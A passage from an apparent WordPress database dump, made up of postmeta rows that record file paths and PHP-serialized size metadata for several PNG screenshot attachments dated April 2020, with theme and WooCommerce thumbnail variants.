:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-762x550.png\";s:5:\"width\";i:762;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-550x808.png\";s:5:\"width\";i:550;s:6:\"height\";i:808;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-600x636.png\";s:5:\"width\";i:600;s:6:\"height\";i:636;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-600x636.png\";s:5:\"width\";i:600;s:6:\"height\";i:636;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13329,5155,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-15.59.58.png'),(13330,5155,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:762;s:6:\"height\";i:808;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-15.59.58.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-283x300.png\";s:5:\"width\";i:283;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-762x550.png\";s:5:\"width\";i:762;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-550x808.png\";s:5:\"width\";i:550;s:6:\"height\";i:808;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-600x636.png\";s:5:\"width\";i:600;s:6:\"height\";i:636;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-600x636.png\";s:5:\"width\";i:600;s:6:\"height\";i:636;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.58-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13331,5156,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.00.16.png'),(13332,5156,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1190;s:6:\"height\";i:1050;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.00.16.png\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.00.16-1024x904.png\";s:5:\"width\";i:1024;s:6:\"height\";i:904;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-768x678.png\";s:5:\"width\";i:768;s:6:\"height\";i:678;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.00.16-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.00.16-550x1050.png\";s:5:\"width\";i:550;s:6:\"height\";i:1050;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-04-13-at-16.00.16-1100x1050.png\";s:5:\"width\";i:1100;s:6:\"height\";i:1050;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-600x529.png\";s:5:\"width\";i:600;s:6:\"height\";i:529;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-600x529.png\";s:5:\"width\";i:600;s:6:\"height\";i:529;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.16-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13333,5157,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.00.45.png'),(13334,5157,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:1348;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.00.45.png\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-285x300.png\";s:5:\"width\";i:285;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.00.45-972x1024.png\";s:5:\"width\";i:972;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-768x809.png\";s:5:\"width\";i:768;s:6:\"height\";i:809;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.00.45-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.00.45-550x1100.png\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-04-13-at-16.00.45-1100x1100.png\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-600x632.png\";s:5:\"width\";i:600;s:6:\"height\";i:632;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-600x632.png\";s:5:\"width\";i:600;s:6:\"height\";i:632;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.00.45-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13335,5158,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.01.13.png'),(13336,5158,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:1294;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.01.13.png\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-297x300.png\";s:5:\"width\";i:297;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-04-13-at-16.01.13-1013x1024.png\";s:5:\"width\";i:1013;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-768x776.png\";s:5:\"width\";i:768;s:6:\"height\";i:776;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.01.13-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.01.13-550x1100.png\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-04-13-at-16.01.13-1100x1100.png\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-600x607.png\";s:5:\"width\";i:600;s:6:\"height\";i:607;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-600x607.png\";s:5:\"width\";i:600;s:6:\"height\";i:607;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.13-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13337,5159,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.01.31.png'),(13338,5159,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:758;s:6:\"height\";i:740;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.01.31.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-300x293.png\";s:5:\"width\";i:300;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-758x550.png\";s:5:\"width\";i:758;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-550x740.png\";s:5:\"width\";i:550;s:6:\"height\";i:740;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-600x586.png\";s:5:\"width\";i:600;s:6:\"height\";i:586;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-600x586.png\";s:5:\"width\";i:600;s:6:\"height\";i:586;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13339,5160,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.01.56.png'),(13340,5160,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:760;s:6:\"height\";i:774;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.01.56.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-295x300.png\";s:5:\"width\";i:295;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-760x550.png\";s:5:\"width\";i:760;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-550x774.png\";s:5:\"width\";i:550;s:6:\"height\";i:774;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-600x611.png\";s:5:\"width\";i:600;s:6:\"height\";i:611;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-600x611.png\";s:5:\"width\";i:600;s:6:\"height\";i:611;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.01.56-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13341,5161,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.02.14.png'),(13342,5161,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:742;s:6:\"height\";i:832;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.02.14.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-268x300.png\";s:5:\"width\";i:268;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-742x550.png\";s:5:\"width\";i:742;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-550x832.png\";s:5:\"width\";i:550;s:6:\"height\";i:832;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-600x673.png\";s:5:\"width\";i:600;s